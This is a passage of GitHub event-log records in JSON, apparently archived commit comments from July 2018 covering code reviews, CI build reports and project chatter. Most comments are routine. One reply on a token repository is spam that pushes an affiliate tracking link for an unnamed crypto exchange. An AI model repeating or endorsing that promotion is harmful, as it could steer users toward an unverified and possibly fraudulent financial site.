\r\n\r\nPD: si el eclipse no te \"recomienda nada\" escribiendo un .jsp es un tema de eclipse eso... \r\n\r\nEn cuanto a \"la magia\", no existe, es una ilusión. Al igual que la magia de verdad. Lamentablemente por el tiempo que tenemos no podemos dar en profundidad Spring porque es muuy grande y sería muy engorroso darlo a muy bajo nivel. Pero si querés podés buscar info :D Creeme no hay mucha \"magia\". Todo es código ;) Lo máximo de magia que vas a llegar son las cosas en bajo nivel de java, escritas en C, etc pero bueno ya ahí empezamos a trabajar a un nivel muuuy \"bajo\"... Por lo pronto toda duda \"general de alto nivel\" de Spring que tengas y pueda responderte de manera correcta, intentaré hacerlo! \r\n\r\nPD2: Otra cosa \"buena\" de spring es que hace \"de todo\"... Prácticamente para lo que quieras podes usar Spring y encima está para otros lenguajes/plataformas... Es un gigante, nos guste más o nos guste menos. Y como tal está bueno aprenderlo. Aunque eventualmente será cambiado por otra cosa que va a hacer más o menos lo mismo pero distinto. Si entendés Spring después vas a poder aprender solo \"prácticamente cualquier cosa\" que haga lo mismo ;) \r\n\r\nEspero haber aclarado aunque sea un poco :P Cualquier cosa escriban! \r\nNo hablé con jony pero supongo que debe pensar más o menos parecido a mi. "}},"created_at":"2018-07-23T22:52:13Z"}
{"id":"8006854176","type":"CommitCommentEvent","actor":{"login":"ramireles"},"repo":{"name":"Peterquilll/rudiments"},"payload":{"comment":{"id":29806909,"position":null,"line":null,"path":null,"commit_id":"311014f638c9948ad0a6ffa8c59c123534aabaf3","created_at":"2018-07-23T22:52:15Z","updated_at":"2018-07-23T22:52:15Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [trees](https://trello.com/c/gHGhCxfO/3-trees)"}},"created_at":"2018-07-23T22:52:15Z"}
{"id":"8006854793","type":"CommitCommentEvent","actor":{"login":"tjcurington"},"repo":{"name":"tjcurington/website"},"payload":{"comment":{"id":29806911,"position":1,"line":9,"path":"README.md","commit_id":"6f952161098370c4f53114638f5bbe7b39f80bdf","created_at":"2018-07-23T22:52:25Z","updated_at":"2018-07-23T22:52:25Z","author_association":"OWNER","body":"## What is this for??\r\n\r\nPlease explain this line better"}},"created_at":"2018-07-23T22:52:25Z"}
{"id":"8006854823","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"ClusterM/hakchi2"},"payload":{"comment":{"id":29806913,"position":null,"line":null,"path":null,"commit_id":"1d18116378d23281c4ba18efb269592780e1b52b","created_at":"2018-07-23T22:52:26Z","updated_at":"2018-07-23T22:52:26Z","author_association":"COLLABORATOR","body":"Shonen jump has no ramdisk"}},"created_at":"2018-07-23T22:52:26Z"}
{"id":"8006857222","type":"CommitCommentEvent","actor":{"login":"apijay"},"repo":{"name":"apijay/complex"},"payload":{"comment":{"id":29806926,"position":null,"line":null,"path":null,"commit_id":"71eebfcac5b534ae2a0f70aac153ace5b4596884","created_at":"2018-07-23T22:53:11Z","updated_at":"2018-07-23T22:53:11Z","author_association":"OWNER","body":"delete readme"}},"created_at":"2018-07-23T22:53:11Z"}
{"id":"8006859037","type":"CommitCommentEvent","actor":{"login":"mdpiper"},"repo":{"name":"permamodel/pbs-server"},"payload":{"comment":{"id":29806934,"position":null,"line":null,"path":null,"commit_id":"4ea8d62bda97a3c700cd92c073ad81ad74b00aa8","created_at":"2018-07-23T22:53:47Z","updated_at":"2018-07-23T22:53:47Z","author_association":"MEMBER","body":"The **pbs_server/data** directory, as well as all the **.cfg.tmpl** files within, must have `a+w` permissions."}},"created_at":"2018-07-23T22:53:47Z"}
{"id":"8006859962","type":"CommitCommentEvent","actor":{"login":"tjcurington"},"repo":{"name":"tjcurington/website"},"payload":{"comment":{"id":29806936,"position":null,"line":null,"path":null,"commit_id":"6f952161098370c4f53114638f5bbe7b39f80bdf","created_at":"2018-07-23T22:54:05Z","updated_at":"2018-07-23T22:54:05Z","author_association":"OWNER","body":"##  Commit Comment\r\n\r\nLooking at how this commit was created"}},"created_at":"2018-07-23T22:54:05Z"}
{"id":"8006861515","type":"CommitCommentEvent","actor":{"login":"emzeidan"},"repo":{"name":"emzeidan/bamboo-specs-test"},"payload":{"comment":{"id":29806942,"position":null,"line":null,"path":null,"commit_id":"4d73b5526b12762f6e7649ff01dde5b9055931d1","created_at":"2018-07-23T22:54:35Z","updated_at":"2018-07-23T22:54:35Z","author_association":"OWNER","body":"# Error in Bamboo Specs\n:scroll: [View error logs](http://eliasz.office.atlassian.com:8085/spec-logs/46891009/4d73b5526b12762f6e7649ff01dde5b9055931d1.log?referrer=commit)\n### Affected plans\n\nBecause of an error in Bamboo Specs, the following plans could not be updated.\n\nProject | Plan | Build\n---|---|---\n[GitHub Specs](http://eliasz.office.atlassian.com:8085/browse/GHSPECS) | [Test Plan](http://eliasz.office.atlassian.com:8085/browse/GHSPECS-TEST)  | :exclamation: [\\#16](http://eliasz.office.atlassian.com:8085/browse/GHSPECS-TEST-16)\n\n"}},"created_at":"2018-07-23T22:54:35Z"}
{"id":"8006865086","type":"CommitCommentEvent","actor":{"login":"emzeidan"},"repo":{"name":"emzeidan/bamboo-specs-test"},"payload":{"comment":{"id":29806949,"position":null,"line":null,"path":null,"commit_id":"4d73b5526b12762f6e7649ff01dde5b9055931d1","created_at":"2018-07-23T22:55:42Z","updated_at":"2018-07-23T22:55:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://eliasz.office.atlassian.com:8085/spec-logs/46891009/4d73b5526b12762f6e7649ff01dde5b9055931d1.log?referrer=commit)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Git Hub Specs](http://eliasz.office.atlassian.com:8085/browse/GHSPECS) | [Test Plan](http://eliasz.office.atlassian.com:8085/browse/GHSPECS-TEST)  | :white_check_mark: [\\#17](http://eliasz.office.atlassian.com:8085/browse/GHSPECS-TEST-17)\n\n"}},"created_at":"2018-07-23T22:55:42Z"}
{"id":"8006865301","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29806951,"position":121,"line":101,"path":"testing/rspamd/APKBUILD","commit_id":"0d052d0578de9e3674bd66da6686dcd7f56b2cea","created_at":"2018-07-23T22:55:46Z","updated_at":"2018-07-23T22:55:46Z","author_association":"MEMBER","body":"@vakartel Why did you split fuzzy into subpackage that contains just configuration files?"}},"created_at":"2018-07-23T22:55:46Z"}
{"id":"8006866160","type":"CommitCommentEvent","actor":{"login":"mweinelt"},"repo":{"name":"f-breidenstein/CptHook"},"payload":{"comment":{"id":29806953,"position":33,"line":33,"path":"simple.go","commit_id":"98c7fa6a462d436437ff581b18fcc9d715b775d0","created_at":"2018-07-23T22:56:02Z","updated_at":"2018-07-23T22:56:02Z","author_association":"NONE","body":"How does it handle very long lines?"}},"created_at":"2018-07-23T22:56:02Z"}
{"id":"8006867974","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806964,"position":23,"line":23,"path":"Lesson_2/6.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:56:38Z","updated_at":"2018-07-23T22:56:38Z","author_association":"NONE","body":"Тут  решение изменится на более просто с учетом замечаний выше. Тут будет |name, details| и из деталей можно будет получить details[:item_price]"}},"created_at":"2018-07-23T22:56:38Z"}
{"id":"8006871052","type":"CommitCommentEvent","actor":{"login":"freezed"},"repo":{"name":"freezed/ocp5"},"payload":{"comment":{"id":29806974,"position":null,"line":null,"path":null,"commit_id":"650fc334ca2878367aedb596727fe8eaee0f6727","created_at":"2018-07-23T22:57:41Z","updated_at":"2018-07-23T22:57:41Z","author_association":"OWNER","body":"close #9 "}},"created_at":"2018-07-23T22:57:41Z"}
{"id":"8006872263","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29806979,"position":10,"line":10,"path":"Lesson_2/5.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T22:58:04Z","updated_at":"2018-07-23T22:58:04Z","author_association":"NONE","body":"Достаточно одномероного массива для хранения кол-ва дней в месяце, без указания самого порядкового номера месяца."}},"created_at":"2018-07-23T22:58:04Z"}
{"id":"8006874736","type":"CommitCommentEvent","actor":{"login":"vbychkoviak"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29806991,"position":87,"line":165,"path":"lang/llvm-6.0/Portfile","commit_id":"c3f687bb5590f70197f0fbb52cb2d9f48a459eab","created_at":"2018-07-23T22:58:52Z","updated_at":"2018-07-23T22:58:52Z","author_association":"NONE","body":"created ticket for that \r\nhttps://trac.macports.org/ticket/56855"}},"created_at":"2018-07-23T22:58:52Z"}
{"id":"8006875231","type":"CommitCommentEvent","actor":{"login":"tiembo"},"repo":{"name":"tiembo/dokka"},"payload":{"comment":{"id":29806993,"position":4,"line":710,"path":"core/src/main/kotlin/Formats/DacHtmlFormat.kt","commit_id":"33e649e829febf659eeb86230c05c30ecebd65b8","created_at":"2018-07-23T22:59:02Z","updated_at":"2018-07-23T22:59:02Z","author_association":"OWNER","body":"Addressed in https://github.com/tiembo/dokka/commit/fbc0ef44fe50d91a613a1f575bf33157d705579b"}},"created_at":"2018-07-23T22:59:02Z"}
{"id":"8006875510","type":"CommitCommentEvent","actor":{"login":"tiembo"},"repo":{"name":"tiembo/dokka"},"payload":{"comment":{"id":29806994,"position":33,"line":742,"path":"core/src/main/kotlin/Formats/DacHtmlFormat.kt","commit_id":"33e649e829febf659eeb86230c05c30ecebd65b8","created_at":"2018-07-23T22:59:08Z","updated_at":"2018-07-23T22:59:08Z","author_association":"OWNER","body":"Addressed in https://github.com/tiembo/dokka/commit/fbc0ef44fe50d91a613a1f575bf33157d705579b"}},"created_at":"2018-07-23T22:59:08Z"}
{"id":"8006880698","type":"CommitCommentEvent","actor":{"login":"tiembo"},"repo":{"name":"tiembo/dokka"},"payload":{"comment":{"id":29807010,"position":33,"line":742,"path":"core/src/main/kotlin/Formats/DacHtmlFormat.kt","commit_id":"33e649e829febf659eeb86230c05c30ecebd65b8","created_at":"2018-07-23T23:00:42Z","updated_at":"2018-07-23T23:00:42Z","author_association":"OWNER","body":"Addressed in https://github.com/tiembo/dokka/commit/51fcb95ad7dac3260092ea173d1a3146a56dcc38"}},"created_at":"2018-07-23T23:00:42Z"}
{"id":"8006885882","type":"CommitCommentEvent","actor":{"login":"j-morel"},"repo":{"name":"j-morel/jmp"},"payload":{"comment":{"id":29807020,"position":null,"line":null,"path":null,"commit_id":"2fa35bc84ddc3cb088f847a8d245d284be380f44","created_at":"2018-07-23T23:02:24Z","updated_at":"2018-07-23T23:02:24Z","author_association":"OWNER","body":"No newline is detected here."}},"created_at":"2018-07-23T23:02:24Z"}
{"id":"8006886568","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29807021,"position":30,"line":30,"path":"Lesson_2/5.rb","commit_id":"3beb59ac272d8bd00763808943a7024d9c6ed932","created_at":"2018-07-23T23:02:38Z","updated_at":"2018-07-23T23:02:38Z","author_association":"NONE","body":"Тут лучше просто скомбинировать условия одной строкой без присваивания переменных. Переменные в данном случае лишний уровень абстрацкции затрудняющий чтение кода."}},"created_at":"2018-07-23T23:02:38Z"}
{"id":"8006886586","type":"CommitCommentEvent","actor":{"login":"maximede"},"repo":{"name":"uw-it-edm/acs-extension"},"payload":{"comment":{"id":29807022,"position":16,"line":32,"path":"models/uwContentModel.xml","commit_id":"f2b885d43d927e6a1c29fbb8c1382f328783f493","created_at":"2018-07-23T23:02:38Z","updated_at":"2018-07-23T23:02:38Z","author_association":"CONTRIBUTOR","body":"I think it should be `false` \r\nalso, `atomic` and `stored` are not used when ACS is using solr"}},"created_at":"2018-07-23T23:02:38Z"}
{"id":"8006890241","type":"CommitCommentEvent","actor":{"login":"grechka62"},"repo":{"name":"DAPolyakov/Money"},"payload":{"comment":{"id":29807028,"position":19,"line":19,"path":"app/build.gradle","commit_id":"5f85a342475d28102d8cf563ddaf2a077bb96f53","created_at":"2018-07-23T23:03:52Z","updated_at":"2018-07-23T23:03:52Z","author_association":"NONE","body":"proguard должен быть включен в релизной сборке, нужен signingConfig.\r\nНеудобно, что первые коммиты не попали в ПР"}},"created_at":"2018-07-23T23:03:52Z"}
{"id":"8006891093","type":"CommitCommentEvent","actor":{"login":"j-morel"},"repo":{"name":"j-morel/jmp"},"payload":{"comment":{"id":29807030,"position":null,"line":null,"path":null,"commit_id":"899fbdfc4195ec90efc4512b0f0162d0d9db857e","created_at":"2018-07-23T23:04:08Z","updated_at":"2018-07-23T23:04:08Z","author_association":"OWNER","body":"Git thinks all lines have changed."}},"created_at":"2018-07-23T23:04:08Z"}
{"id":"8006892122","type":"CommitCommentEvent","actor":{"login":"nagpaulo"},"repo":{"name":"nagpaulo/ponto-inteligente-api"},"payload":{"comment":{"id":29807032,"position":null,"line":null,"path":null,"commit_id":"3737247e79e88bff42a475d700d37dbfca9c0cea","created_at":"2018-07-23T23:04:28Z","updated_at":"2018-07-23T23:04:28Z","author_association":"OWNER","body":"Comitando teste"}},"created_at":"2018-07-23T23:04:28Z"}
{"id":"8006892156","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29807033,"position":72,"line":106,"path":"content/post/hugo-pipes/index.md","commit_id":"0066e325b12b14d3c9a470478c2f058ce93af12a","created_at":"2018-07-23T23:04:29Z","updated_at":"2018-07-23T23:04:29Z","author_association":"COLLABORATOR","body":"Ruby Sass is announced as deprecated on March 2019 in favor of Dart Sass. One less update to do 😄 "}},"created_at":"2018-07-23T23:04:29Z"}
{"id":"8006898054","type":"CommitCommentEvent","actor":{"login":"emzeidan"},"repo":{"name":"emzeidan/bamboo-specs-test-2"},"payload":{"comment":{"id":29807044,"position":null,"line":null,"path":null,"commit_id":"4216ba7f0d6bbc5d01cfc83d17a9f5682ecbb43e","created_at":"2018-07-23T23:06:24Z","updated_at":"2018-07-23T23:06:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://eliasz.office.atlassian.com:8085/spec-logs/46891009/4216ba7f0d6bbc5d01cfc83d17a9f5682ecbb43e.log?referrer=commit)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Git Hub Specs](http://eliasz.office.atlassian.com:8085/browse/GHSPECS) | [Dragon Slayer YAML](http://eliasz.office.atlassian.com:8085/browse/GHSPECS-SLAYAML)  | :white_check_mark: [\\#1](http://eliasz.office.atlassian.com:8085/browse/GHSPECS-SLAYAML-1)\n\n"}},"created_at":"2018-07-23T23:06:24Z"}
{"id":"8006901091","type":"CommitCommentEvent","actor":{"login":"s3439510"},"repo":{"name":"s3439510/teammates"},"payload":{"comment":{"id":29807048,"position":null,"line":null,"path":null,"commit_id":"4d199799efce8609d079db1baeda76a825431bf7","created_at":"2018-07-23T23:07:24Z","updated_at":"2018-07-23T23:07:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test Commit](https://trello.com/c/4BtreZHQ/3-test-commit)"}},"created_at":"2018-07-23T23:07:24Z"}
{"id":"8006903009","type":"CommitCommentEvent","actor":{"login":"Quix0r"},"repo":{"name":"friendica/friendica-addons"},"payload":{"comment":{"id":29807052,"position":79,"line":65,"path":"diaspora/diaspora.php","commit_id":"280e835481506a47bf50f3c153ca70e8d2f3ad24","created_at":"2018-07-23T23:08:02Z","updated_at":"2018-07-23T23:08:02Z","author_association":"CONTRIBUTOR","body":"Here the parser error is."}},"created_at":"2018-07-23T23:08:02Z"}
{"id":"8006904986","type":"CommitCommentEvent","actor":{"login":"rednoah"},"repo":{"name":"filebot/scripts"},"payload":{"comment":{"id":29807058,"position":5,"line":14,"path":"amc.groovy","commit_id":"0479eda071a4eaa69440dea73670d7dafef2e085","created_at":"2018-07-23T23:08:42Z","updated_at":"2018-07-23T23:08:42Z","author_association":"MEMBER","body":"Nope. It's a global property. You'll need to run a more recent revision."}},"created_at":"2018-07-23T23:08:42Z"}
{"id":"8006906868","type":"CommitCommentEvent","actor":{"login":"lackac"},"repo":{"name":"elixir-lang/flow"},"payload":{"comment":{"id":29807063,"position":18,"line":610,"path":"lib/flow.ex","commit_id":"16fecf4bafef60a4d1742d889c28a0abe661cb30","created_at":"2018-07-23T23:09:20Z","updated_at":"2018-07-23T23:09:20Z","author_association":"CONTRIBUTOR","body":"hm, I couldn't find another `merge/2` or `merge/1`. If there was one, you're saying that other one wouldn't be deprecated and that's why we could only warn at runtime?"}},"created_at":"2018-07-23T23:09:20Z"}
{"id":"8006909002","type":"CommitCommentEvent","actor":{"login":"GregoryLundberg"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29807066,"position":null,"line":null,"path":null,"commit_id":"d911268a783467842d38eae7ac1630f1fea41318","created_at":"2018-07-23T23:10:04Z","updated_at":"2018-07-23T23:10:04Z","author_association":"CONTRIBUTOR","body":"You really need to put your wrapper in place so we can use unmodified Lua sources.\r\n\r\nWe have two choices:\r\n\r\n1) Never upgrade Lua again, or\r\n\r\n2) Forget to re-implement your changes and wind up omitting it, causing this issue to re-appear\r\n"}},"created_at":"2018-07-23T23:10:04Z"}
{"id":"8006909233","type":"CommitCommentEvent","actor":{"login":"Stanzilla"},"repo":{"name":"kemayo/wow-handynotes-legiontreasures"},"payload":{"comment":{"id":29807067,"position":50,"line":163,"path":"config.lua","commit_id":"f5088fa9a0ba09cc233e957654c1c820fd68d353","created_at":"2018-07-23T23:10:09Z","updated_at":"2018-07-23T23:10:09Z","author_association":"NONE","body":"!"}},"created_at":"2018-07-23T23:10:09Z"}
{"id":"8006909836","type":"CommitCommentEvent","actor":{"login":"j-morel"},"repo":{"name":"j-morel/jmp"},"payload":{"comment":{"id":29807068,"position":null,"line":null,"path":null,"commit_id":"b87eccd73742413db04a61fcb57e8893f6ac35c6","created_at":"2018-07-23T23:10:19Z","updated_at":"2018-07-23T23:10:19Z","author_association":"OWNER","body":"Tow lines changed. Line #23 since a line break was added, and line #24 is new..."}},"created_at":"2018-07-23T23:10:19Z"}
{"id":"8006911528","type":"CommitCommentEvent","actor":{"login":"steven-johnson"},"repo":{"name":"halide/Halide"},"payload":{"comment":{"id":29807073,"position":6,"line":201,"path":"src/AsyncProducers.cpp","commit_id":"4a719572a822b3ba8f7c204ae8c48efee33b3f74","created_at":"2018-07-23T23:10:53Z","updated_at":"2018-07-23T23:10:53Z","author_association":"CONTRIBUTOR","body":"What sort of evil compiler won't flag this? Sigh"}},"created_at":"2018-07-23T23:10:53Z"}
{"id":"8006915955","type":"CommitCommentEvent","actor":{"login":"etpinard"},"repo":{"name":"plotly/plotly.js"},"payload":{"comment":{"id":29807086,"position":14,"line":915,"path":"src/plots/plots.js","commit_id":"3790734abdf0c6c37f1864cba726ed2493820376","created_at":"2018-07-23T23:12:22Z","updated_at":"2018-07-23T23:12:22Z","author_association":"MEMBER","body":"This makes `fullLayout._has('gl') === true` even when all scattergl traces are `visible !== true` which in turn makes `Cartersian.plot` call `Scattergl.plot` here:\r\n\r\nhttps://github.com/plotly/plotly.js/blob/180b6b9225173e834ff92245b6f3620bfcfd14a8/src/plots/cartesian/index.js#L269-L274\r\n\r\nand sets up an empty `scene.visibleBatch` ready to be skipped on render.\r\n\r\nPreviously, when all scattergl traces were `visible !== true`, we would clear the scene here:\r\n\r\nhttps://github.com/plotly/plotly.js/blob/180b6b9225173e834ff92245b6f3620bfcfd14a8/src/plots/cartesian/index.js#L312-L320\r\n\r\nresulting in very slow updates."}},"created_at":"2018-07-23T23:12:22Z"}
{"id":"8006917828","type":"CommitCommentEvent","actor":{"login":"CyrusNajmabadi"},"repo":{"name":"pulumi/pulumi-aws"},"payload":{"comment":{"id":29807091,"position":6,"line":211,"path":"build/common.mk","commit_id":"55a61deff12eb259dd347fb5183c508ac3c4effe","created_at":"2018-07-23T23:13:01Z","updated_at":"2018-07-23T23:13:01Z","author_association":"CONTRIBUTOR","body":"this code was triplicated.  any way to have some sort of shell function to lower the duplication?"}},"created_at":"2018-07-23T23:13:01Z"}
{"id":"8006917953","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29807092,"position":null,"line":null,"path":null,"commit_id":"6d29c1b435551e309a93dbafb442c25d69cd8708","created_at":"2018-07-23T23:13:04Z","updated_at":"2018-07-23T23:13:04Z","author_association":"CONTRIBUTOR","body":"Лол, я был пьяным, когда это копипастил. Там вообще переделать надо на процентов 80%. "}},"created_at":"2018-07-23T23:13:04Z"}
{"id":"8006924196","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29807105,"position":null,"line":null,"path":null,"commit_id":"34740cfe1af941eb9abc44b83a8e5b265969ce50","created_at":"2018-07-23T23:15:06Z","updated_at":"2018-07-23T23:15:06Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/34740cfe1af941eb9abc44b83a8e5b265969ce50)\n\nBuilt at __20180723 - 23:15:06__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//console) | no test results, t: n/a | FAIL :red_circle: \ncoverage | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/coverage.txt) | 1030 cases, 119 failed, t: 585s | FAIL :red_circle: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 801s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/clang.debug.unity.txt) | 1030 cases, 119 failed, t: 253s | FAIL :red_circle: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/clang.debug.nounity.txt) | 1028 cases, 119 failed, t: 161s | FAIL :red_circle: \nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/rpm.txt) | 1029 cases, 119 failed, t: n/a | FAIL :red_circle: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/gcc.debug.unity.txt) | 1030 cases, 119 failed, t: 253s | FAIL :red_circle: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1030 cases, 119 failed, t: 492s | FAIL :red_circle: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/gcc.debug.nounity.txt) | 1028 cases, 119 failed, t: 297s | FAIL :red_circle: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/clang.release.unity_Dassert_true.txt) | 1029 cases, 119 failed, t: 341s | FAIL :red_circle: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//console) | no test results, t: n/a | FAIL :red_circle: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/gcc.debug.unity_Dstatic_true.txt) | 1030 cases, 119 failed, t: 250s | FAIL :red_circle: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//artifact/gcc.release.unity_Dassert_true.txt) | 1029 cases, 119 failed, t: 356s | FAIL :red_circle: \nmsvc.release | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/20//console) | no test results, t: n/a | FAIL :red_circle: \n\n"}},"created_at":"2018-07-23T23:15:06Z"}
{"id":"8006933991","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"storm119/android_frameworks_base"},"payload":{"comment":{"id":29807122,"position":null,"line":null,"path":null,"commit_id":"fbdc8deeeff133351711568ea058bc63ea319980","created_at":"2018-07-23T23:18:30Z","updated_at":"2018-07-23T23:18:30Z","author_association":"NONE","body":"The problem with things like this is that over time the original commits get lost and this becomes the 'standard'.  All it takes is a few ROMs to start cherry picking this and the original commits start to fade. Plus is better to show your work @storm119, helps people understand what @varund7726 did, what I did and what you did."}},"created_at":"2018-07-23T23:18:30Z"}
{"id":"8006940590","type":"CommitCommentEvent","actor":{"login":"Tithand"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29807133,"position":null,"line":null,"path":null,"commit_id":"f59e8047ef7f3c90dee3929cade8997fd0f51bf9","created_at":"2018-07-23T23:20:39Z","updated_at":"2018-07-23T23:20:39Z","author_association":"NONE","body":"leviathonbeast, how i can contact you?"}},"created_at":"2018-07-23T23:20:39Z"}
{"id":"8006944777","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29807139,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T23:22:04Z","updated_at":"2018-07-23T23:22:04Z","author_association":"NONE","body":"https://oodltrack.com/trackers.php?affid=77&l=0\nNEW CRYPTO EXCHANGE, FIRST 30K USERS PAY NO FEES FOR 60 DAYS\n\nOn Monday, July 23, 2018, Anderson <notifications@github.com> wrote:\n\n> Very good!!!\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29806532>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXb_9NULTMBEd0lAbIBvt00V2rxeeks5uJkk7gaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-23T23:22:04Z"}
{"id":"8006971686","type":"CommitCommentEvent","actor":{"login":"debbiejong"},"repo":{"name":"debbiejong/Photogram"},"payload":{"comment":{"id":29807185,"position":null,"line":null,"path":null,"commit_id":"a62d8aeb2a46a1ab4b79e0f8e5e87de796e72167","created_at":"2018-07-23T23:31:21Z","updated_at":"2018-07-23T23:31:21Z","author_association":"OWNER","body":"to show* user name"}},"created_at":"2018-07-23T23:31:21Z"}
{"id":"8006972623","type":"CommitCommentEvent","actor":{"login":"kadler"},"repo":{"name":"Club-Seiden/pykit"},"payload":{"comment":{"id":29807189,"position":2,"line":1,"path":"pykit/Character.py","commit_id":"d00313241714c0b1115d08bff28c871902fca668","created_at":"2018-07-23T23:31:39Z","updated_at":"2018-07-23T23:31:39Z","author_association":"COLLABORATOR","body":"https://www.python.org/dev/peps/pep-0008/#descriptive-naming-styles\r\n\r\nFYI modules should be lower case, while classes can and should be CamelCase. Modules within the same package should use relative imports to ensure the correct module gets pulled in (there could be another module or package named `character.py` for example.\r\n\r\n```\r\nfrom .parameter import Parameter\r\n```\r\n\r\nI also don't think it's worth having separate python files for each class. Having one `types.py` should be sufficient."}},"created_at":"2018-07-23T23:31:39Z"}
{"id":"8006979568","type":"CommitCommentEvent","actor":{"login":"Boyuptheroad"},"repo":{"name":"Boyuptheroad/railsgirls.github.io"},"payload":{"comment":{"id":29807204,"position":4,"line":274,"path":"_posts/2012-04-18-app.markdown","commit_id":"9c538693076da002e9fbe3deb6e436de018041f3","created_at":"2018-07-23T23:34:02Z","updated_at":"2018-07-23T23:34:02Z","author_association":"OWNER","body":" `app/assets/stylesheets/application.c"}},"created_at":"2018-07-23T23:34:02Z"}
{"id":"8006979873","type":"CommitCommentEvent","actor":{"login":"kemayo"},"repo":{"name":"kemayo/wow-handynotes-legiontreasures"},"payload":{"comment":{"id":29807205,"position":50,"line":163,"path":"config.lua","commit_id":"f5088fa9a0ba09cc233e957654c1c820fd68d353","created_at":"2018-07-23T23:34:08Z","updated_at":"2018-07-23T23:34:08Z","author_association":"OWNER","body":"Nothing in this one is actually flagged as repeatable, so I figured disabling the check made sense. It got carried over from the Warlords one, where the Terrok stuff came back."}},"created_at":"2018-07-23T23:34:08Z"}
{"id":"8006981407","type":"CommitCommentEvent","actor":{"login":"MynockSpit"},"repo":{"name":"RecursiveThinking/recursive_thinking_website_tech_docs"},"payload":{"comment":{"id":29807212,"position":36,"line":29,"path":"scripts/layout.js","commit_id":"b9ed17b73f3fa6358ea9c32e069e810626b0f40c","created_at":"2018-07-23T23:34:39Z","updated_at":"2018-07-23T23:34:39Z","author_association":"MEMBER","body":"As a suggestion: [`document.querySelectorAll(\".tab-category\")`](https://developer.mozilla.org/en-US/docs/Web/API/Document/querySelectorAll) does the same thing, and is way more powerful. It takes the same syntax as you use for css stylesheets. (e.g. '#id .class')\r\n\r\nThat said, there's nothing wrong with this syntax."}},"created_at":"2018-07-23T23:34:39Z"}
